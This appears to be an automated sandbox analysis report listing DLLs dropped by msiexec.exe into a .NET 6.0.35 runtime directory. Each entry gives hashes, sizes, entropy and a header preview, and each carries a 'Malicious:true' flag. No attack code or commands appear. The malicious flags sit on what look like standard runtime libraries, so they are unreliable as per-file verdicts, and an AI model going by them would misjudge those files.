                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M............."!..0.............^)... ........@.. ..............................].....`..................................)..S....@..h................)...`......d(..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B................@)......H........ ......................P ..........................................Y...N.$...i.]....,....C..Y./....U....#......9id.....\G@..b{..@..+.%.>..d.E.........9.6...W....O.....<.6}...{.z....&BSJB............v4.0.30319......`.......#~..,.......#Strings............#GUID...........#Blob......................3................................................".p.....p...;.>.........f.............Q.....Q.....&...!.&.....&...[.&.....&.....&.....&...B.&...O.&...v.p...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.782221204196243
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:WR0yWYi2W8pWjA6Kr4PFHnhWgN7agWykfKUSIX01k9z3ARqzJDL/:RyWYi2W8YA6VFHRN7C2IR9zooH/
                                                                                                                                                                                                                                                                                                                                  MD5:4089E1C839BC40FB1412C37BE8A6C3FE
                                                                                                                                                                                                                                                                                                                                  SHA1:5CCC3643FE29E5DD454ADC2E7127FE22D3982983
                                                                                                                                                                                                                                                                                                                                  SHA-256:4481BE9159BBA109BF872B6A7FD176CFA55416D4A8A666CCA60251B848AF7E54
                                                                                                                                                                                                                                                                                                                                  SHA-512:17BB639068C9DDCDD49380400E3829F82AF414C68FB53A68F4640B8FFF491F14ED35CD3F89A1030873D84BACE6558FF2F2099F5EF5598F7E1C58D6ECEDD8466F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m..........."!..0.............^)... ........@.. ....................................`..................................)..S....@..X................)...`......h(..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B................@)......H........ ......................P ........................................~w.;p.....B.@gTM.j..Ms..LXP..r....T....?46BDb.6..V.:.X._.F(..S.s...@..,ZO..le=.=[.k.=%..>2....wk.._I.2..O..3(k......[cBSJB............v4.0.30319......`.......#~..,.......#Strings............#GUID...........#Blob......................3..................................................y.....y...G.G.........r.......(.....Z.....Z...../...-./...../...g./...../...../...../...N./...[./.....y...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):247080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.849191153993673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:GsS/IAVyNU2kbEf5+i6MKORygikbyO2DGJ0pebVq:GsBAr2vt6MikbD2CieVq
                                                                                                                                                                                                                                                                                                                                  MD5:E17BE481647C2DDCFFCD74FF9FBC1A74
                                                                                                                                                                                                                                                                                                                                  SHA1:7A5E9AA77CD0C8C72BA81311934BFFC3AECE2342
                                                                                                                                                                                                                                                                                                                                  SHA-256:086E14D805EF4CEFDB25506736DCC5D6E800D618DF672358CB1112BA04A1F8CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:3C2342D9B1DE3E7E191A543F1C1D47ED04A679400F79A77B9F044E93425864603F453CBA86929173E5B14EBEEB929B3729DF1F902B5E655A8DC716F316174C74
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C6..........." .....`...:............................................................`...@......@............... .......................................e..........()..........P...T...............................................................H............text...._.......`.................. ..`.data....5...p...6...b..............@....reloc..............................@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...C.o.n.c.u.r.r.e.n.t...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):666288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.78661325216844
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:W36Xx8oDIB+7QBj0YBC6WXz66M4cRuco/oMy5iu:W3EWIX5at
                                                                                                                                                                                                                                                                                                                                  MD5:1B93945C7F04740122C60D8C9221654A
                                                                                                                                                                                                                                                                                                                                  SHA1:D19F777B688704693BDE7C8B0456D8D82D8B3AB4
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C23E0E757D0DBF213A6BBFF8A76336D0AE762547EE898FA6F03F4C1A11C63C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:23319E803AB3A271812FE3BFBBA76EDF33D8F13C446CABA164BE1E68C0645B4D119818644642F15A02C266FE65090688D3734CB8BFD0A61D81B5136E77C1AC88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...nP............" ......................................................... ............`...@......@............... ......................................,...P^.......(...... ...."..T...............................................................H............text............................... ..`.data...:.... ......................@....reloc.. ...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...v./...C.o.m.m.e.n.t.s...T.h.i.s. .p.a.c.k.a.g.e. .p.r.o.v.i.d.e.s. .c.o.l.l.e.c.t.i.o.n.s. .t.h.a.t. .a.r.e. .t.h.r.e.a.d. .s.a.f.e. .a.n.d. .g.u.a.r.a.n.t.e.e.d. .t.o. .n.e.v.e.r. .c.h.a.n.g.e. .

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):101144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.476048974487395
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:vfgNzmjhqPdxPhjxSd+XBQCvePLDrnsrpyi3:3Nhq0FsE4
                                                                                                                                                                                                                                                                                                                                  MD5:67FFDB95AB55A741D15CCCD4C7B75DBA
                                                                                                                                                                                                                                                                                                                                  SHA1:D73B4BFBF850A3184990976B959CF08F925FBD08
                                                                                                                                                                                                                                                                                                                                  SHA-256:1F8D33569B15DB329B49388E6DC03A9121739F2F4155901761A56CF66CFA2477
                                                                                                                                                                                                                                                                                                                                  SHA-512:744E2409DFDBF41B4E1A568B0323FBEDB3F08368C812664CF7B7CF0F4FA269C7641CCC3BDC82075B97494829CF29D08E928BCE8AB4290B312EB6AB7CB8249758
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....u..........." .....L................................................................`...@......@............... ......................................(3.......b...)..........H...T...............................................................H............text...0K.......L.................. ..`.data........`.......N..............@....reloc...............`..............@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...N.o.n.G.e.n.e.r.i.c...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.534791453724649
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:jWfjc8LAhPvoiTCxaDVvkDTC5O7/LyY204yhpVeypoi8C4dezFc:j0QsAZNBsDTs+zyY204yhpVey6dIO
                                                                                                                                                                                                                                                                                                                                  MD5:2BB568CF400E0890E8AA25DA5445D3FF
                                                                                                                                                                                                                                                                                                                                  SHA1:15C9D61A4EEFA521E7FD3FD51DF60AF80486FFED
                                                                                                                                                                                                                                                                                                                                  SHA-256:49577AAE05031B386CB8C04275047ECE9A0D63A6C4BBDFB1A4AE3B7841761CE3
                                                                                                                                                                                                                                                                                                                                  SHA-512:C2616137D3D41CF9F1A3F89F4F891C7DB09C18332CE5367C433C868E38DC9AF34D7A5D29D6023464F4250DB5EB1124319ED2A04BE2CEE9371391C7C498D8992A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....V............" .....6..........................................................O.....`...@......@............... .......................................0..h....L...)...p......P...T...............................................................H............text...x4.......6.................. ..`.data...\....P.......8..............@....reloc.......p.......J..............@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...S.p.e.c.i.a.l.i.z.e.d.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):264992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.761266470511353
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:30bzt+JuwscekH2KrzQ5t056pAje2l3qZ7CLzG:35JuwDvHQNW27CLy
                                                                                                                                                                                                                                                                                                                                  MD5:ECAF66EE198849D3200E028C0A31CE8B
                                                                                                                                                                                                                                                                                                                                  SHA1:521E58557861EC5E549BFE9836E6E54C55E7F38A
                                                                                                                                                                                                                                                                                                                                  SHA-256:193A45006B2330E29C5FC6D0D3F92C269D9E9BDF1FA141E51B0A07909B7A02E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:A5A73B4D1C6D3E346FC7DC85CD1E77181F2946FE99F0181B7BE68B98D8319718A07D4707DD3F709778175D3FDE73915B9AFED8FC451210D93CC596C8DF6CD8F8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...6e8..........." .........@............................................................`...@......@............... ..................................t...,].......... )......,.......T...........................................................x...H............text............................... ..`.data.../9.......:..................@....reloc..,...........................@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...C.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):187192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.462092532995058
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:l7PmpgPixtBuguLv7F8IbGumTG5D5/vbF6V+F7LWYkQ6v+P0:FepnxeB1QG5lF7qtQ6v+M
                                                                                                                                                                                                                                                                                                                                  MD5:39FAEB8118FD29C6205C0A2129E91454
                                                                                                                                                                                                                                                                                                                                  SHA1:560A13F6BCAFB43B40F51770E6E2268AA2B37B4D
                                                                                                                                                                                                                                                                                                                                  SHA-256:8146999337103583BB15FFD1D5DA680D6FE35F594A5AE49EDCFF5A16BD8B7B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:2631B643253CA643CDA19B9E3AEE72131EC5EAC4B7B81821DC45EA57B2A4CD23420A7808D979E90A609BE3D338BBC278F986E801001D92DC342FDF92ECC12F0D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....2w..........." .....v...:......................................................[.....`...@......@............... ...................................... G..........8)..........("..T...............................................................H............text...*t.......v.................. ..`.data...a4.......6...x..............@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...\."...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...A.n.n.o.t.a.t.i.o.n.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...l."...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.642694010569177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:m8imyfJe9eGXx44sAcUUWudXWwYA6VFHRN7T2lNbZR9zah6:m8j+nxTFClTsFT9zn
                                                                                                                                                                                                                                                                                                                                  MD5:399D1C1EE94247E9EF6500A017A71C1B
                                                                                                                                                                                                                                                                                                                                  SHA1:822F0321519EB59D625175CBF1A655F2F7699A9A
                                                                                                                                                                                                                                                                                                                                  SHA-256:D6693E0D5F2F24774E991A351F97D740E75A73FAD20295C4E2DDD51D9B65B6BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:F577118238FC96FDACFE23CA6D37AA736CAD858022E20E65D881C7D06648D2D4EBD5E80E8F5B398E95A8F1DCE4B653022D71371AD9C75E514F687DA7359CD6A1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............0... ...@....... ...............................r....`.................................;0..O....@...................)...`......8/..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................o0......H.......P ..h...........................................................BSJB............v4.0.30319......l...D...#~......L...#Strings............#US.........#GUID.......X...#Blob............T.........3....................................+...............M.p...P.p.....]...........................O.....7.................>.....[...............................9.....p.................W.....W.....W...).W...1.W...9.W...A.W...I.W...Q.W...Y.W...a.W...i.W...q.W...y.W.....W. ...W.....W...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.487371211774158
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:2IzyrkRPK1c3I484t6gu2FClLsl9zal7pQ:2IzBP8c3z6guiiLs3zarQ
                                                                                                                                                                                                                                                                                                                                  MD5:F81A8E96C4B41133CE2FBA56D63F4C22
                                                                                                                                                                                                                                                                                                                                  SHA1:85849958E58BF6A9FD5BEFDB67FF98842E6466B0
                                                                                                                                                                                                                                                                                                                                  SHA-256:77367BEF47DE9D2DEF9C606906A84D733A1D688BCF7299956828FB54C6A36422
                                                                                                                                                                                                                                                                                                                                  SHA-512:65102174EDF155614F696E1A251A2DD6A69176B61211EC5194067FE203D6B73D91D6A8E6E9D63188DD8A76BAB051E7EB77BEF00D7C569A798E53CD9BF20B1A27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....%..........." .....b..........................................................T.....`...@......@............... ......................................$...x....n...)..............T...............................................................H............text...Ra.......b.................. ..`.data................d..............@....reloc...............l..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...d.&...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...E.v.e.n.t.B.a.s.e.d.A.s.y.n.c...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...t.&...F.i.l.e.D.e.s.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.41974698596593
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:P2sgnMIPQZQmsB2q+mKl/Q3mb1yF0YDC2oKQ15hC9QQs2mDLFClKmoQ9zRhoy:OsgXcmKmWYFlC2oKQsi3iKmVzRh
                                                                                                                                                                                                                                                                                                                                  MD5:596B37F463658FD24CE29F3F25C6628A
                                                                                                                                                                                                                                                                                                                                  SHA1:BE186A42FF6EE13C7F2546C3A7CAA622B4829FA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:9B05AF160EFFCE0A352E0FB722350221A1F2A41010EFF10E769C12C3C28ABF10
                                                                                                                                                                                                                                                                                                                                  SHA-512:B03607DB59376501B6AFF0A0D04FA49B4CD106D9E009D5CBA006C6909A04BAD74FEAACAD0FE40704DA34D1D6AFD34F26D97C8B1090E4B6A177F52CEB5ADD4D54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....A............" ......................................................... ............`...@......@............... .......................................&...........(..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...P.r.i.m.i.t.i.v.e.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):747280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.696052130941475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:Yq+dHPXqf5N+iMMturyUV8mIEUGKea0RAh5RNFRSll++KzUmw/BndUMHz6ifKjFW:yv+N+iMMturyU+m6RNFZUmw/BnfT6KK0
                                                                                                                                                                                                                                                                                                                                  MD5:97D87D45E05EAC86E89F33FFB66DD9CC
                                                                                                                                                                                                                                                                                                                                  SHA1:3B29D3210B4A1ABC1D2876599F776950E56C3451
                                                                                                                                                                                                                                                                                                                                  SHA-256:52BE87AB0CD386C0BE9538E44B9D1432BCF28370E98D568CBDAB409C84EC1889
                                                                                                                                                                                                                                                                                                                                  SHA-512:94834AD8ABB9F99E779D1DBF15502CA918B8D89ED83027CBDE5B7C8C15CBAF325286F4C127396E725F4490881D247EC411FD23E6D71C1B1C60A2C83366C18F06
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....._..........." .....n...................................................P......V.....`...@......@............... ..........................................<]...>...)...@..$...8=..T...............................................................H............text....m.......n.................. ..`.data................p..............@....reloc..$....@......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...`.$...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...T.y.p.e.C.o.n.v.e.r.t.e.r...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...p.$...F.i.l.e.D.e.s.c.r.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.596746437040324
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:LW4X1Wove+Scpij+uCozWEdYA6VFHRN7QHWMR9z2QgW:/RScci4FCl8Z9zzgW
                                                                                                                                                                                                                                                                                                                                  MD5:0C8FF2C70D84FB0202750D8A19E0EC20
                                                                                                                                                                                                                                                                                                                                  SHA1:0BCE9D795D182291948DA212B728CA3476D58F58
                                                                                                                                                                                                                                                                                                                                  SHA-256:651C26058CD4C530458E740923E4CA85F76EEF6FE9E915631678800E9AD7E862
                                                                                                                                                                                                                                                                                                                                  SHA-512:872D7DB41EA2941B9305C6702A18F32E8C3F9EB363E239CA2851D5F9EF7B724BD0D6B034FDEA07419A08CC30B7F8F667F2924E25180126F5CE747EB93C7987EE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....*u..........." .........................................................P......B.....`...@......@............... ..........................................`.... ...)...@...... ...T...............................................................H............text............................... ..`.data...N....0......................@....reloc.......@......................@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...D.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...T.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dll

                                                                                                                                                                                                                                                                                                                                  Download File
